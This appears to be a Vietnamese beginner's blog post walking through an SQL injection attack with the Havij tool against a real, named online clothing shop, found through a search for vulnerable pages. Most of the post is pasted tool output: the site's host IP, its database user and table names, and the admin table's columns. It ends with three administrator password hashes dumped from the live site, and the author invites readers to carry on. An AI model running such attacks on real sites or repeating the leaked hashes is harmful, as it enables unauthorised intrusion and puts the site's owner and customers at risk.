- GG sẽ thống kê cho ta rất nhiều site dính lỗi này
- chọn đại một cái www.zoolyfashion.com/productinfo.php?id=769
- Bật Havij lên và đưa linh lỗi đó vô cho nó quét
-Kết quả :
Analyzing www.zoolyfashion.com/productinfo.php?id=769
Host IP: 173.201.150.242
Web Server: Apache
Keyword Found: retail
Injection type is Integer
DB Server: MySQL >=5
Current DB: zoolyshop
MySQL error based injection method can be used!
-Tìm infomation của site
Current User: zoolyshop@97.74.24.169
Sql Version: 5.0.91-log
Current DB: zoolyshop
System User: zoolyshop@97.74.24.169
DB User: 'zoolyshop'@'%'
Data Bases: information_schema
zoolyshop
-Kiếm Table Shop
Count(table_name) of information_schema.tables Where table_schema=0x7A6F6F6C7973686F70 is 36
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables Where table_schema=0x7A6F6F6C7973686F70 is 36
Table found: admininfo
Table found: brands
Table found: contact
Table found: contactmenu
Table found: country
Table found: email
Table found: exchange
Table found: friendlinkpic
Table found: gifboxprice
Table found: indexpic
Table found: kuaitijiage
Table found: linshiorder
Table found: loginuser
Table found: message
Error (10051): The network cannot be reached from this host at this time
Bypassing illegal union failed! Turning off this feature
Table found: myinfo
Table found: news
Table found: newstree
Table found: order_mx
Table found: orderform
Table found: products
Table found: products_test
Table found: productsreview
Table found: promenu
Error (10051): The network cannot be reached from this host at this time
Table found: proprice
Table found: propricedis
Table found: prosize
Table found: quotemessage
Error (10051): The network cannot be reached from this host at this time
Table found: shipping
Table found: shoppingguide
Table found: siteservice
Table found: useraddress
Table found: userinfo
Table found: wishlist
Table found: yhl
-không siêu về cái này nhưng chọn đại table admininfo để mần
Count(column_name) of information_schema.columns Where table_schema=0x7A6F6F6C7973686F70 AND table_name=0x61646D696E696E666F is 4
Column found: ID
Column found: username
Column found: password
Column found: privilage
- rối rắm quá, chọn đại Column found: password
Count(*) of zoolyshop.admininfo is 3
Data Found: password=78bf9587b4f0a2d0b3a248a66b27e07e
Data Found: password=96e79218965eb72c92a549dd5a330112
Data Found: password=25d55ad283aa400af464c76d713c07ad
-Thêm Column found: ID
Data Found: password=78bf9587b4f0a2d0b3a248a66b27e07e
Data Found: ID=1
Data Found: password=96e79218965eb72c92a549dd5a330112
Data Found: ID=4
Data Found: password=25d55ad283aa400af464c76d713c07ad
Data Found: ID=5
...........
-em mò đến đây thui, mò quá họ chửi cho, ai thích đi tiếp thì tìm hiểu nha....kiến thức SQL bao la lắm, cái mình biết chỉ là muỗi thui...
- em vẫn noopbie lắm, mấy anh pro đừng chém em tội nghiệp! Cafe_Online !
Không có nhận xét nào:
Đăng nhận xét